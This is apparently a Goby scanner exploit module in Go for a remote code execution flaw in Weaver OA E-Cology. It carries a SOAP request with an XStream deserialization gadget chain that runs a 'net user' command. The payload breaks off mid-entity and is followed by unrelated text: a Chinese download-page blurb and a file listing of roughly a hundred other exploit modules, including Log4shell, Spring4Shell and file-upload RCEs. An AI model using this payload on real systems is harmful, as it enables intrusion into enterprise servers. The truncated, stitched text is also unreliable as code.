package exploits
import (
"fmt"
"git.gobies.org/goby/goscanner/goutils"
"git.gobies.org/goby/goscanner/jsonvul"
"git.gobies.org/goby/goscanner/scanconfig"
"git.gobies.org/goby/httpclient"
"strings"
)
func init() {
expJson := `{
"Name": "Weaver OA E-Cology Workflowservicexml RCE",
"Description": "Weaver OA E-Cology Workflowservicexml RCE",
"Product": "Weaver OA E-Cology",
"Homepage": "https://www.weaver.com.cn/",
"DisclosureDate": "2021-05-19",
"Author": "PeiQi",
"GobyQuery": "app=\"Weaver-OA\"",
"Level": "3",
"Impact": "RCE",
"Recommendation": "",
"References": [
"http://wiki.peiqi.tech"
],
"HasExp": true,
"ExpParams": [
{
"name": "Cmd",
"type": "input",
"value": "whoami"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"data": "",
"data_type": "text",
"follow_redirect": true,
"method": "GET",
"uri": "/"
},
"ResponseTest": {
"checks": [
{
"bz": "",
"operation": "==",
"type": "item",
"value": "200",
"variable": "$code"
}
],
"operation": "AND",
"type": "group"
}
}
],
"ExploitSteps": null,
"Tags": ["RCE"],
"CVEIDs": null,
"CVSSScore": "0.0",
"AttackSurfaces": {
"Application": ["Weaver OA"],
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}`
ExpManager.AddExploit(NewExploit(
goutils.GetFileName(),
expJson,
func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
uri := "/services%20/WorkflowServiceXml"
cfg := httpclient.NewPostRequestConfig(uri)
cfg.VerifyTls = false
cfg.FollowRedirect = false
cfg.Header.Store("Content-type", "text/xml")
cfg.Header.Store("Cmd", "net user")
cfg.Data = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:web=\"webservices.services.weaver.com.cn\"><soapenv:Header/><soapenv:Body><web:doCreateWorkflowRequest><web:string><java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
      <comparator class='javafx.collections.ObservableList$1'/>
    </default>
    <int>3</int>
    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
      <dataHandler>
        <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
          <contentType>text/plain</contentType>
          <is class='java.io.SequenceInputStream'>
            <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
              <iterator class='com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator'>
                <names class='java.util.AbstractList$Itr'>
                  <cursor>0</cursor>
                  <lastRet>-1</lastRet>
                  <expectedModCount>0</expectedModCount>
                  <outer-class class='java.util.Arrays$ArrayList'>
                &#x
Goby 最全最新POC共计448个 包含了致远OA A6 用户敏感信息泄露、Apache_Druid_Log4shell_CVE_2021_44228、Apache_JSPWiki_Log4shell_CVE-2021-44228、VMware_NSX_Log4shell_CVE_2021_44228、VMware_vCenter_Log4shell_CVE_2021_44228_1、Wayos AC集中管理系统默认弱口令 CNVD-2021-00876、Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109、XXL-JOB 任务调度中心 后台默认弱口令、帆软报表 v8.0 任意文件读取漏洞 CNVD-2018-04757、锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞、蜂网互联 企业级路由器v4.31 密码泄露漏洞 CVE-2019-16313、Oracle_Weblogic_SearchPublicRegistries.jsp_SSRF_CVE_2014_4210、Micro_module_monitoring_system_User_list.php_
Goby 最全最新POC共计448个 (448个子文件)
Weaver_OA_E_Cology_Workflowservicexml_RCE.go 84KB
Weaver_e_cology_OA_XStream_RCE_CVE_2021_21350.go 81KB
ForgeRock_AM_RCE_CVE_2021_35464.go 25KB
TopSec_TopACM_Remote_Command_Execution.go 10KB
H3C CVM Arbitrary File Upload Vulnerability.go 10KB
landray_oa_treexml_rce.go 10KB
Tongda OA Arbitrary User Login Vulnerability.go 10KB
CNPOWER OA Arbitrary File Upload Vulnerability.go 10KB
nsfocus_resourse.php_arbitrary_file_upload_vulnerability.go 9KB
showDocGo.go 8KB
Atlassian_Confluence_Webwork_OGNL_Inject_CVE_2022_26134.go 8KB
TRS-MAS testCommandExecutor.jsp Remote Command Execution.go 6KB
F5_BIG_IP_login_bypass_CVE_2022_1388.go 6KB
showDocJson.go 6KB
ESAFENET_DLP_dataimport_RCE.go 6KB
H3C_IMC_dynamiccontent.properties.xhtm_RCE.go 6KB
Elasticsearch_Remote_Code_Execution_CVE_2015_1427.go 6KB
Elasticsearch_Remote_Code_Execution_CVE_2014_3120.go 5KB
Tongda_OA_api.ali.php_RCE.go 5KB
QiAnXin_Tianqing_terminal_security_management_system_client_upload_file.json_getshell.go 5KB
Webgrind_File_read_cve_2018_12909.go 5KB
Many_network_devices_have_arbitrary_file_downloads.go 5KB
Longjing_Technology_BEMS_API_1.21_Remote_Arbitrary_File_Download.go 4KB
FLIR_AX8_Arbitrary_File_Download_Vulnerability_CNVD-2021-39018.go 4KB
Node_red_UI_base_Arbitrary_File_Read_Vulnerability_CVE_2021_3223.go 4KB
SPON_IP_network_intercom_broadcast_system_getjson.php_Arbitrary_file_read.go 4KB
TopSec_Reporter_Arbitrary_file_download_CNVD_2021_41972.go 4KB
AceNet_AceReporter_Report_component_Arbitrary_file_download.go 4KB
dahua_DSS_Arbitrary_file_download_cnvd_2020_61986.go 4KB
SPON_IP_network_intercom_broadcast_system_ping.php_RCE.go 4KB
SPON_IP_network_intercom_broadcast_system_exportrecord.php_any_file_download.go 4KB
Panabit_Application_Gateway_ajax_top_backstage_RCE.go 4KB
WangKang_Next_generation_firewall_router_RCE.go 4KB
Panabit_iXCache_ajax_cmd_backstage_RCE.go 4KB
Panabit_Panalog_cmdhandle.php_backstage_RCE.go 4KB
ZhongQing_naibo_Education_Cloud_platform_reset_password.go 4KB
Jellyfin_Audio_File_read_CVE_2021_21402.go 4KB
ZhongQing_naibo_Education_Cloud_Platform_Information_leakage.go 4KB
ShiziyuCms_wxapp.php_File_update.go 4KB
xiaomi_Mi_wiFi_From_File_Read_To_Login_CVE_2019_18370.go 4KB
ZhongYuan_iAudit_get_luser_by_sshport.php_RCE.go 4KB
JEEWMS_Arbitrary_File_Read_Vulnerability.go 4KB
SPON_IP_network_intercom_broadcast_system_rj_get_token.php_any_file_read.go 3KB
NVS3000_integrated_video_surveillance_platform_is_not_accessible.go 3KB
Shenzhen_West_dieter_Technology_Co_LTD_CPE_WiFi__tracert_RCE.go 3KB
Shenzhen_West_dieter_Technology_Co_LTD_CPE_WiFi__ping_RCE.go 3KB
Apache Solr Log4j JNDI RCE.go 3KB
Tuchuang_Library_System_Arbitrary_Reading_File_CNVD_2021_34454.go 3KB
Holographic_AI_network_operation_and_maintenance_platform_RCE.go 3KB
HEJIA_PEMS_SystemLog.cgi_Arbitrary_file_download.go 3KB
Many_network_devices_have_password_leaks.go 3KB
ShopXO_download_File_read_CNVD_2021_15822.go 3KB
WangKang_NS_ASG_cert_download.php_File_read.go 3KB
Huijietong_cloud_video_fileDownload_File_read.go 3KB
SECWORLD_Next_generation_firewall_pki_file_download_File_read.go 3KB
D_Link_Dir_645_getcfg.php_Account_password_disclosure_CVE_2019_17506.go 3KB
Selea_OCR_ANPR_SeleaCamera_File_read.go 3KB
D_Link_ShareCenter_DNS_320_system_mgr.cgi_RCE.go 3KB
Selea_OCR_ANPR_get_file.php_File_read.go 3KB
ACTI_camera_images_File_read.go 3KB
LanhaiZuoyue_system_download.php_File_read.go 3KB
LanhaiZuoyue_system_debug.php_RCE.go 3KB
Kingdee_EAS_server_file_Directory_traversal.go 3KB
ZZZCMS_parserSearch_RCE.go 3KB
ZhongkeWangwei_Next_generation_firewall_File_read.go 3KB
TamronOS_IPTV_ping_RCE.go 2KB
JingHe_OA_download.asp_File_read.go 2KB
nsoft_EWEBS_casmain.xgi_File_read.go 2KB
H3C_Next_generation_firewall_File_read.go 2KB
H3C_HG659_lib_File_read.go 2KB
Huijietong_cloud_video_list_Information_leakage.go 2KB
ShiziyuCms_ApigoodsController.class.php_SQL_injection.go 2KB
ShiziyuCms_ApiController.class.php_SQL_injection.go 2KB
HanWang_Time_Attendance_SQL_injection.go 2KB
H3C_SecPath_Operation_Login_bypass.go 2KB
Zhongxing_F460_web_shell_cmd.gch_RCE.go 2KB
Qilai_OA_CloseMsg.aspx_SQL_injection.go 2KB
Apache_HTTP_Server_2.4.48_mod_proxy_SSRF_CVE_2021_40438.json 19KB
Spring_Cloud_Gateway_Actuator_API_SpEL_Code_Injection_CVE_2022_22947.json 14KB
Apache_HTTP_Server_SSRF_CVE-2021-40438.json 12KB
Atlassian_Jira_Path_Traversal_CVE_2021_26086.json 12KB
Apache_HTTP_Server_SSRF_CVE_2021_40438.json 12KB
CVE_2022_22947.json 11KB
Spring_Boot_Actuator_Logview_Path_Traversal_CVE_2021_21234.json 10KB
Oracle_Weblogic_SearchPublicRegistries.jsp_SSRF_CVE_2014_4210.json 10KB
Jellyfin_prior_to_10.7.0_Unauthenticated_Arbitrary_File_Read_CVE_2021_21402.json 10KB
Apache_2.4.49_RCE_CVE_2021_41773_and_2.4.50_CVE_2021_42013.json 9KB
HotelDruid_Hotel_Management_Software_v3.0.3_XSS_CVE_2022_26564.json 9KB
Jetty_WEB_INF_FileRead_CVE_2021_34429.json 9KB
VMware_NSX_Log4shell_CVE-2021-44228.json 8KB
Tianwen_ERP_system__uploadfile.aspx_Arbitraryvfilevupload.json 8KB
VMware_NSX_Log4shell_CVE_2021_44228.json 8KB
DotCMS_Arbitrary_File_Upload_CVE_2022_26352.json 7KB
WSO2_Management_Console_Unrestricted_Arbitrary_File_Upload_RCE_CVE_2022_29464.json 7KB
VMware_vCenter_Log4shell_CVE-2021-44228_(1).json 7KB
Tianwen_ERP_system_FileUpload_CNVD_2020_28119.json 7KB
Weblogic_SSRF.json 7KB
VMware_vCenter_Log4shell_CVE_2021_44228_1.json 7KB
H3C_IMC_RCE.json 7KB
Spring_Framework_Data_Binding_Rules_Spring4Shell_RCE_CVE_2022_22965.json 7KB